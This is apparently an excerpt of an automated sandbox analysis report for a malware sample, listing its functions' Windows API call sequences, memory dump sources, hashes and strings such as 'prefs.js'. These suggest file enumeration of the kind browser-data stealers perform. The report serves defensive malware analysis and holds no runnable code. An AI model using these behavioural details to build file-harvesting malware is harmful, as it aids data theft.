                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                • String ID: %s\%s$%s\*$P2#v$1#v
                                                • API String ID: 13328894-4226942003
                                                • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                APIs
                                                • wsprintfA.USER32 ref: 00823B33
                                                • FindFirstFileA.KERNEL32(?,?), ref: 00823B4A
                                                • lstrcat.KERNEL32(?,?), ref: 00823B9C
                                                • StrCmpCA.SHLWAPI(?,00420F70), ref: 00823BAE
                                                • StrCmpCA.SHLWAPI(?,00420F74), ref: 00823BC4
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00823ECE
                                                • FindClose.KERNEL32(000000FF), ref: 00823EE3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                • String ID:
                                                • API String ID: 1125553467-0
                                                • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                • Instruction ID: 2aeb10fd657d9c03f02b75a86a3c6069d50140f86b77009adc88ad3f7d191c21
                                                • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                • Instruction Fuzzy Hash: 49A15DB5A40218ABDB24DFA4DC85FEA73B9FF49300F044588B60D96181EB759B84CF62
                                                APIs
                                                • wsprintfA.USER32 ref: 00824B93
                                                • FindFirstFileA.KERNEL32(?,?), ref: 00824BAA
                                                • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00824BD8
                                                • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00824BEE
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00824DE4
                                                • FindClose.KERNEL32(000000FF), ref: 00824DF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                • String ID:
                                                • API String ID: 180737720-0
                                                • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                • Instruction ID: 86985b123e2dc82e2c1e6f94c4ff3a64b7cd364a6d507c9cf3f4372f11a2d62c
                                                • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                • Instruction Fuzzy Hash: C9618775540218ABCB24EBE4ED49FEA73BDFF49300F004588B609D2141EB759B84CFA2
                                                APIs
                                                • wsprintfA.USER32 ref: 00413EC3
                                                • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                • FindClose.KERNEL32(000000FF), ref: 00414081
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                • String ID: %s\%s$P2#v$1#v
                                                • API String ID: 180737720-1025293131
                                                • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0081C15C
                                                • StrCmpCA.SHLWAPI(?,004213F8), ref: 0081C1B4
                                                • StrCmpCA.SHLWAPI(?,004213FC), ref: 0081C1CA
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0081CA26
                                                • FindClose.KERNEL32(000000FF), ref: 0081CA38
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                • String ID:
                                                • API String ID: 3334442632-0
                                                • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                • Instruction ID: 05f6502e87e9abd48108353c21412cc166364563283d3a631a8091de76a04973
                                                • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                • Instruction Fuzzy Hash: 6E420E72910128ABCB18FBA8ED96EED737DFF54700F404568B50AD6191EE349B88CB53
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008247E7
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 008247EE
                                                • wsprintfA.USER32 ref: 0082480D
                                                • FindFirstFileA.KERNEL32(?,?), ref: 00824824
                                                • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00824852
                                                • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00824868
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008248F2
                                                • FindClose.KERNEL32(000000FF), ref: 00824907
                                                • lstrcat.KERNEL32(?,0064A524), ref: 0082492C
                                                • lstrcat.KERNEL32(?,0064A22C), ref: 0082493F
                                                • lstrlen.KERNEL32(?), ref: 0082494C
                                                • lstrlen.KERNEL32(?), ref: 0082495D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                • String ID:
                                                • API String ID: 671575355-0
                                                • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                • Instruction ID: 8eea8ffe75b0af18314a81edf19b10b89bc1fffd11bf4752c1bda08d9ff8d787
                                                • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                • Instruction Fuzzy Hash: 655183B9590218ABCB24EBB4DC89FE9737DFF58700F405588B649D2190DB749BC48FA2
                                                APIs
                                                • wsprintfA.USER32 ref: 0040ED3E
                                                • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                • String ID: %s\*.*$P2#v$1#v
                                                • API String ID: 180737720-3139634048
                                                • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                • String ID: 4@$P2#v$\*.*$1#v
                                                • API String ID: 2325840235-3454896120
                                                • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                • String ID: P2#v$prefs.js$1#v
                                                • API String ID: 3334442632-2885088814
                                                • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                • String ID: P2#v$1#v
                                                • API String ID: 3334442632-762677545
                                                • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                APIs
                                                • wsprintfA.USER32 ref: 0082412A
                                                • FindFirstFileA.KERNEL32(?,?), ref: 00824141
                                                • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0082416F
                                                • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00824185
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008242D3
                                                • FindClose.KERNEL32(000000FF), ref: 008242E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                • String ID:
                                                • API String ID: 180737720-0
                                                • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                • Instruction ID: b2470830ce712e74934315cbfa020e2e86d6752c09e7ca28629079fbd03eec65
                                                • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                • Instruction Fuzzy Hash: FE5151B5940228ABCB24EBB4ED89EEA737DFF54300F00458CB659D2180DB759BC58FA5
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
                                                • StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
                                                • StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                • String ID: P2#v$\*.*$1#v
                                                • API String ID: 1415058207-2075649900
                                                • Opcode ID: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
                                                • Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
                                                • Opcode Fuzzy Hash: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
                                                • Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                • String ID: P2#v$\*.*$1#v$@
                                                • API String ID: 433455689-1092267622
                                                • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                APIs
                                                • wsprintfA.USER32 ref: 0081EFA5
                                                • FindFirstFileA.KERNEL32(?,?), ref: 0081EFBC
                                                • StrCmpCA.SHLWAPI(?,00421538), ref: 0081F012
                                                • StrCmpCA.SHLWAPI(?,0042153C), ref: 0081F028
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0081F515
                                                • FindClose.KERNEL32(000000FF), ref: 0081F52A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                • String ID:
                                                • API String ID: 180737720-0
                                                • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                • Instruction ID: cace048ba317f8188a73e7f588e0d042b119032307c151598a9f3f31b6795c7f
                                                • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                • Instruction Fuzzy Hash: B9E1DC719112389BDB18EB64ED92EEE7379FF54700F4041E9B50AA2492EE305BC9CF52
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0081DD52
                                                • StrCmpCA.SHLWAPI(?,004214B4), ref: 0081DD9A
                                                • StrCmpCA.SHLWAPI(?,004214B8), ref: 0081DDB0
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0081E033
                                                • FindClose.KERNEL32(000000FF), ref: 0081E045
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                • String ID:
                                                • API String ID: 3334442632-0
                                                • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                • Instruction ID: 6656886a2af39ada9900ad19b5fe1829e5e5b5d448bd1a3509575943d9dbfb35
                                                • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                • Instruction Fuzzy Hash: 319110729002289BCB18FBB4ED96AED737DFF95300F004558B54AD6141EE349B98CB93
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0081F985
                                                • StrCmpCA.SHLWAPI(?,004215BC), ref: 0081F9D6
                                                • StrCmpCA.SHLWAPI(?,004215C0), ref: 0081F9EC
                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0081FD18
                                                • FindClose.KERNEL32(000000FF), ref: 0081FD2A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
